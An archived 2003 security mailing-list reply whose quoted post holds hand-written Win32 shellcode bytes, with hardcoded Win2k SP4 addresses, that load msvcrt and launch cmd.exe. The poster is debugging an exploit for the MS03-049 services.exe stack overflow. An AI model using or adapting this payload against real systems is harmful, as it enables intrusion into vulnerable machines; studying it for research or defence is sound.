Re: Win32 Shellcode question.

From: Tobias Klein (tobias.klein_at_ewetel.de)
Date: 12/01/03

  • Next message: Brett Moore: "RE: [PenTest] Re: Win32 Shellcode question."
    Date: Mon, 01 Dec 2003 09:07:12 +0100
    To: "Vinay A. Maha***" <devnull001@fastmail.fm>, vuln-dev@securityfocus.com, pentest@yahoogroups.com

    http://www.newroot.de/projects/winsys.c
    greets newroot

    At 19:29 27.11.2003 -0800, Vinay A. Maha*** wrote:
    >I was writing an exploit for the MS03-049 services.exe stack overflow vuln
    >(from scratch for my own academic interest). Here's my shellcode to simply
    >launch a "cmd.exe" shell.
    >
    >#define LL 0x7C4F05CF
    >#define SYS 0x78018EBF
    >
    >char payload[] = {
    > 0x55, // push ebp
    > 0x8B, 0xEC, // mov ebp,esp
    >
    > 0x33, 0xC0, // xor eax,eax
    > 0x50, // push eax
    > 0x50, // push eax
    > 0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63,
    > // mov dword ptr [ebp-8],6376736Dh
    > 0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,
    > // mov word ptr [ebp-4],7472h
    > 0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
    > 0x50, // push eax
    > 0xB8, 0xCF, 0x05, 0x4F, 0x7C, // mov eax,LL
    > 0xFF, 0xD0, // call eax <------------ Problem call
    > 0x8B, 0xE5, // mov esp,ebp
    >
    > 0x33, 0xC0, // xor eax,eax
    > 0x50, // push eax
    > 0x50, // push eax
    > 0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E,
    > // mov dword ptr [ebp-8],2E646D63h
    > 0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,
    > // mov word ptr [ebp-4],7865h
    > 0xC6, 0x45, 0xFE, 0x65,
    > // mov byte ptr [ebp-2],65h
    > 0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
    > 0x50, // push eax
    > 0xB8, 0xBF, 0x8E, 0x01, 0x78,
    > // mov eax,SYS
    > 0xFF, 0xD0, // call eax
    >...
    > };
    >
    >After the overflow, I can step through the NOP sled, and reach the above
    >payload - meaning I have control over the CPU's exec path, and can make it
    >execute my payload. However, I keep getting an "Access Violation" writing
    >location.. error inside the "call eax" that corresponds with
    >LoadLibrary("msvcrt").
    >
    >I have confirmed the LL and SYS variables for the target (Win2k SP4).
    >Plus, the payload works just fine when compiled and executed outside of
    >services.exe. Is there something special about services.exe that prevents
    >LoadLibraryA from executing normally, or what did I do wrong? Can you spot
    >anything I am overlooking? The same payload has worked on other
    >stack-overflow exploits, and inside a simple main(){} loop.
    >
    >Thanks,
    >Vinay.
